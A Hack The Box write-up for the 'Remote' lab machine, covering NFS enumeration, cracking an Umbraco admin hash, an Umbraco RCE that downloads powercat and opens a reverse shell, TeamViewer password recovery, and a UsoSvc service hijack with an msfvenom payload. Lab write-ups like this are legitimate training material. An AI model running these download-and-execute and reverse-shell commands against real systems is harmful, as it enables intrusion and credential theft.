Hack The Box - Remote Writeup

6 minute read

Hack The Box - Remote image1

Enumeration

Add remote to hosts and start an nmap scan.

Nmap

# Nmap 7.80 scan initiated Thu Jul 23 02:37:22 2020 as: nmap -A -p- -oN _full_tcp_nmap.txt --osscan-guess --version-all remote.htb
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.22s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   286.19 ms 10.10.14.1
2   284.74 ms remote.htb (10.10.10.180)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 23 03:26:46 2020 -- 1 IP address (1 host up) scanned in 2964.71 seconds

There were quite a few rabbit holes, on different ports. I wont be discussing any of those.

Port 80

We have a web server running on port 80.

image1

On browsing around, we can see a login page for umbraco CMS. There is an authenticated RCE for Umbraco. I couldn’t find anything else useful.

image1

Nfs

We can see a folder available on nfs.

kali@kali:~/Desktop/tools/autorecon/results/remote.htb/scans$ showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)

We can mount this on out local machine.

mount.nfs: mount point /tmp/site does not exist
kali@kali:~$ mkdir /tmp/site
kali@kali:~$ sudo mount remote.htb:/site_backups /tmp/site
kali@kali:~$ cd /tmp/site/
kali@kali:/tmp/site$ ls
App_Browsers  App_Plugins    bin     css           Global.asax  scripts  Umbraco_Client  Web.config
App_Data      aspnet_client  Config  default.aspx  Media        Umbraco  Views

This seems to be a site_backup for Umbraco.

Browsing around, we can see a sdf file that is used to store the application info locally. I tried copying it to my machine and opening to using multiple tools. But all were showing the file as corrupted. Not sure why is that.

Anyways, lets run strings on it and see if there is anything interesting inside.

Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
@{pv
qpkaj
dAc0^A\pW
(1&a$
"q!Q
umbracoDomains

----------------Output Snipped-----------------------

roups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate

We can see that, there is an user named admin@htb.local and the following line has the credentials for admin.

adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50

The password is hashed. We can try cracking it using any offline tools, or any online rainbow table lookup websites.

image1

User Shell

We have the credentials for admin, we can now use the Umbraco RCE to get a shell.

The script given in the exploit db only contains a poc. I used this script.

 python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.24:8000/powercat.ps1');powercat -c 10.10.14.24 -p 1234 -e cmd"

The the exploit will execute a powershell command that downloads the powercat script from my machine and then executes a reverse shell. We have to start a python server to serve up the powercat file.

 kali@kali:~/Desktop/htb/remote$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.24] from remote.htb [10.10.10.180] 49684
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

Root Shell (Method 1 Teamviewer using msf)

Run winpeas to look for attack vectors.

TeamViewer

  =======================================================================

    TeamViewer7(TeamViewer GmbH - TeamViewer 7)["C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe"] - Auto - Running
    TeamViewer Remote Software
   ======================================================================

Teamviewer has a vulnerability as it stores passwords without hashing. You can read this writeup for detailed info. We can retrieve the password using a msf module.

msf5 exploit(multi/handler) > use post/windows/gather/credentials/teamviewer_passwords
msf5 post(windows/gather/credentials/teamviewer_passwords) > show options

Module options (post/windows/gather/credentials/teamviewer_passwords):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   SESSION                        yes       The session to run this module on.
   WINDOW_TITLE  TeamViewer       no        Specify a title for getting the window handle, e.g. TeamViewer

msf5 post(windows/gather/credentials/teamviewer_passwords) > set session 4
session => 4
msf5 post(windows/gather/credentials/teamviewer_passwords) > run

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!

And we have the password for teamviewer. I am trying to figure out how to do this without metasploit.

We can use evil-winrm to remote into the machine.

kali@kali:~/Desktop/tools/win/evil-winrm$ ruby evil-winrm.rb -i remote.htb -u 'Administrator' -p '!R3m0te!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And we are root!

Root Shell (Method 2 Teamviewer without msf)

So I wanted to do the Teamviewer method without the msf module. For this all we have to do is dump the registry keys of Teamviewer and then use the python script in this blog to decrypt it.

  1. Dump the registry value of TeamViewer using reg.

     PS C:\Users\Public> reg export HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer team.reg
 reg export HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer team.reg
 The operation completed successfully.

  2. Copy the registry file and open it to get the AES password

     Windows Registry Editor Version 5.00

 [HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer]

 [HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7]
 "StartMenuGroup"="TeamViewer 7"
 "InstallationDate"="2020-02-20"
 "InstallationDirectory"="C:\\Program Files (x86)\\TeamViewer\\Version7"
 "Always_Online"=dword:00000001
 "Security_ActivateDirectIn"=dword:00000000
 "Version"="7.0.43148"
 "ClientIC"=dword:11f25831
---------------------------------Output Snipped---------------------------------
   
 "LastMACUsed"=hex(7):00,00,30,00,30,00,35,00,30,00,35,00,36,00,42,00,39,00,32,\
   00,30,00,35,00,39,00,00,00,00,00
 "MIDInitiativeGUID"="{514ed376-a4ee-4507-a28b-484604ed0ba0}"
 "MIDVersion"=dword:00000001
 "ClientID"=dword:6972e4aa
 "CUse"=dword:00000001
 "LastUpdateCheck"=dword:5e72893c
 "UsageEnvironmentBackup"=dword:00000001
 "SecurityPasswordAES"=hex:ff,9b,1c,73,d6,6b,ce,31,ac,41,3e,ae,13,1b,46,4f,58,\
   2f,6c,e2,d1,e1,f3,da,7e,8d,37,6b,26,39,4e,5b
 "MultiPwdMgmtIDs"=hex(7):61,00,64,00,6d,00,69,00,6e,00,00,00,00,00
 "MultiPwdMgmtPWDs"=hex(7):33,00,35,00,37,00,42,00,43,00,34,00,43,00,38,00,46,\
   00,33,00,33,00,31,00,36,00,30,00,36,00,38,00,32,00,42,00,30,00,31,00,41,00,\
   45,00,32,00,44,00,31,00,43,00,39,00,38,00,37,00,43,00,33,00,46,00,45,00,32,\
   00,42,00,41,00,45,00,30,00,39,00,34,00,35,00,35,00,42,00,39,00,34,00,41,00,\
   31,00,39,00,31,00,39,00,43,00,34,00,43,00,44,00,34,00,39,00,38,00,34,00,35,\
   00,39,00,33,00,41,00,37,00,37,00,00,00,00,00
 "Security_PasswordStrength"=dword:00000003

 [HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\AccessControl]
 "AC_Server_AccessControlType"=dword:00000000

 [HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\DefaultSettings]
 "Autostart_GUI"=dword:00000001

    The value we require is SecurityPasswordAES.

  3. Use the python script to decrypt the key

     kali@kali:~/Desktop/htb/remote$ python3 team.py
 00000000: 21 00 52 00 33 00 6D 00  30 00 74 00 65 00 21 00  !.R.3.m.0.t.e.!.
 00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
 None
 !R3m0te!

And now we can remote into the box using this creds just as show in root method 1.

Root Shell (Method 3 Usosvc service)

We can see that the service usosvc is modifiable and exploiting it can grant us system.

UsoSvc
```bash
  [+] Modifiable Services(T1007)
   [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
    UsoSvc: AllAccess, Start

To exploit

  1. Create a payload using msfvenom and transfer the file to the system 
     msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -a x86  -f exe -o
 shell.exe
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
 No encoder specified, outputting raw payload
 Payload size: 341 bytes
 Final size of exe file: 73802 bytes
 Saved as: shell.exe
 kali@kali:~/Desktop/htb/remote$ server
 HTB IP:10.10.14.24/23
 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
 10.10.10.180 - - [28/Jul/2020 11:29:08] "GET /shell.exe HTTP/1.1" 200 -

  2. Set the usosvc config to point the binpath to our payload and start the service

     PS C:\Users\Public> invoke-webrequest -uri http://10.10.14.24:8000/shell.exe -outfile s.exe
 invoke-webrequest -uri http://10.10.14.24:8000/shell.exe -outfile s.exe

 PS C:\Users\Public> sc.exe config usosvc binPath="c:\users\public\shell.exe"
 sc.exe config usosvc binPath="c:\users\public\shell.exe"
 [SC] ChangeServiceConfig SUCCESS

 PS C:\Users\Public> sc.exe start usosvc
 sc.exe start usosvc
 [SC] StartService FAILED 1053:

 The service did not respond to the start or control request in a timely fashion.

 PS C:\Users\Public>

    Something to note here. Although the service is throwing an error message, our payload ran. First I was trying to use the nc.exe binary along with other flags to get a shell. But for some reason the program would not run. So I changed the payload to msfvenom and then it was working.

  3. Get the connection on our listener

     kali@kali:~/Desktop/tools/win$ msfconsole

 # cowsay++
  ____________
 < metasploit >
  ------------
        \   ,__,
         \  (oo)____
            (__)    )\
               ||--|| *

        =[ metasploit v5.0.97-dev                          ]
 + -- --=[ 2043 exploits - 1105 auxiliary - 344 post       ]
 + -- --=[ 562 payloads - 45 encoders - 10 nops            ]
 + -- --=[ 7 evasion                                       ]

 Metasploit tip: View advanced module options with advanced

 msf5 > use multi/handler
 [*] Using configured payload generic/shell_reverse_tcp
 msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
 payload => windows/shell/reverse_tcp
 msf5 exploit(multi/handler) > set lhost 10.10.14.24
 lhost => 10.10.14.24
 msf5 exploit(multi/handler) > run

 [*] Started reverse TCP handler on 10.10.14.24:4444
 [*] Encoded stage with x86/shikata_ga_nai
 [*] Sending encoded stage (267 bytes) to 10.10.10.180
 [*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.180:49709) at 2020-07-28 11:32:36 -0400

 Microsoft Windows [Version 10.0.17763.107]
 (c) 2018 Microsoft Corporation. All rights reserved.

 C:\Windows\system32>whoami
 whoami
 nt authority\system

And we are root(or system as we are on windows).

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.